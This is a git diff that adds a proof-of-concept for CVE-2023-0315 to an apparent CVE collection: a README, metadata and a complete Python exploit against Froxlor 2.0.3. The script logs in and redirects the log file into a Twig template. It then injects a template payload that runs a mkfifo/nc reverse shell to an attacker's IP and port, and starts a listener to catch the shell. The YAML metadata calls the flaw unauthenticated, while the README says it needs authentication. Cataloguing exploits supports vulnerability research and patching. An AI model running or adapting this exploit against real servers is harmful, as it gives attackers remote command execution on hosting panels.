diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..d0fe71ba89cc6d5e5d30594e95341686d0f35559
--- /dev/null
+++ b/cve/Froxlor/2023/CVE-2023-0315/README.md
@@ -0,0 +1,28 @@
+# CVE-2023-0315 Proof-of-Concept
+### Overview
+This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
+It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
+An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
+For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
+
+### Dependencies
+* Froxlor 2.0.3 Stable 
+* Python 3.8+
+* `requests` Python Library
+* `beautifulsoup4` Python Library
+* Ubuntu 20.04 
+* PHP 8.2
+### Usage
+
+1.Verify the required libraries are installed:
+```
+pip install requests beautifulsoup4
+```
+2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
+
+3.Run the PoC:
+```
+python cve-2023-0315.py
+```
+### Additional Information
+This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
diff --git a/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py
new file mode 100644
index 0000000000000000000000000000000000000000..bb07041b5ac551591414f822d0b4fcbb2ccd28ea
--- /dev/null
+++ b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py
@@ -0,0 +1,135 @@
+#!/usr/bin/python3
+
+# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution
+# Date: 2023-01-08
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2023-0315
+# Vendor Homepage: https://froxlor.org/
+# Version: v2.0.3
+# Tested on: Ubuntu 20.04 / PHP 8.2
+
+import telnetlib
+import requests
+import socket
+import sys
+import warnings
+import random
+import string
+from bs4 import BeautifulSoup
+from urllib.parse import quote
+from threading import Thread
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+
+if len(sys.argv) != 6:
+    print("[~] Usage : ./froxlor-rce.py url username password ip port")
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+request = requests.session()
+
+def login():
+    login_info = {
+    "loginname": username,
+    "password": password,
+    "send": "send",
+    "dologin": ""
+    }
+    login_request = request.post(url+"/index.php", login_info, allow_redirects=False)
+    login_headers = login_request.headers
+    location_header = login_headers["Location"]
+    if location_header == "admin_index.php":
+        return True
+    else:
+        return False
+
+
+def change_log_path():
+    change_log_path_url = url + "/admin_settings.php?page=overview&part=logging"
+    csrf_token_req = request.get(change_log_path_url)
+    csrf_token_req_response = csrf_token_req.text
+    soup = BeautifulSoup(csrf_token_req_response, "lxml")
+    csrf_token = (soup.find("meta",  {"name":"csrf-token"})["content"])
+    print("[+] Main CSRF token retrieved %s" % csrf_token)
+
+    multipart_data = {
+
+        "logger_enabled": (None, "0"),
+        "logger_enabled": (None, "1"),
+        "logger_severity": (None, "2"),
+        "logger_logtypes[]": (None, "file"),
+        "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/footer.html.twig"),
+        "logger_log_cron": (None, "0"),
+        "csrf_token": (None, csrf_token),
+        "page": (None, "overview"),
+        "action": (None, ""),
+        "send": (None, "send")
+    
+    }
+    req = request.post(change_log_path_url, files=multipart_data)
+    response = req.text
+    if "The settings have been successfully saved." in response:
+        print("[+] Changed log file path!")
+        return True
+    else:
+        return False
+
+
+def inject_template():
+    admin_page_path = url + "/admin_index.php"
+    csrf_token_req = request.get(admin_page_path)
+    csrf_token_req_response = csrf_token_req.text
+    soup = BeautifulSoup(csrf_token_req_response, "lxml")
+    csrf_token = (soup.find("meta",  {"name":"csrf-token"})["content"])
+    onliner = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f".format(ip, port)
+    payload = "{{['%s']|filter('exec')}}" % onliner
+    data = {
+        "theme": payload,
+        "csrf_token": csrf_token,
+        "page": "change_theme",
+        "send": "send",
+        "dosave": "",
+    }
+    req = request.post(admin_page_path, data, allow_redirects=False)
+    try:
+        location_header = req.headers["Location"]
+        if location_header == "admin_index.php":
+            print("[+] Injected the payload sucessfully!")
+    except:
+        print("[-] Can't Inject payload :/")
+        exit()
+    handler_thread = Thread(target=connection_handler, args=(port,))
+    handler_thread.start()
+    print("[+] Triggering the payload ...")
+    req2 = request.get(admin_page_path)
+
+
+def connection_handler(port):
+    print("[+] Listener started on port %s" % port)
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", int(port)))
+    s.listen(1)
+    conn, addr = s.accept()
+    print("[+] Connection received from %s" % addr[0])
+    t.sock = conn
+    print("[+] Heads up, incoming shell!!")
+    t.interact()
+
+
+
+if login():
+    print("[+] Successfully Logged in!")
+    index_url = url + "/admin_index.php"
+    request.get(index_url)
+    if change_log_path():
+        inject_template()
+
+else:
+    print("[-] Can't login")
\ No newline at end of file
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..5823536abbef629b12ff077f4ea608daf7ab157d
--- /dev/null
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-0315
+source:
+  https://github.com/mhaskar/CVE-2023-0315
+info:
+  name: Froxlor是一款易于使用且功能强大的服务器管理面板，用于管理各种主机和域名服务。
+  severity: high
+  description: |
+    Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
+  scope-of-influence:
+    Froxlor 2.0.8 之前的版本
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
+    - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-0315
+    cwe-id: CWE-77
+    cnvd-id: None
+    kve-id: None
+  tags: 远程代码执行, RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index fe6ea4727e2c8c4b692317011c41d22b70da44d1..f3d3f72d12ba915987225e18bb8a28a213b905a4 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -155,6 +155,8 @@ cve:
     - CVE-2022-27925
   Grafana:
     - CVE-2021-43798
+  Froxlor:
+    - CVE-2023-0315
 cnvd:
   apache-tomcat:
     - CNVD-2020-10487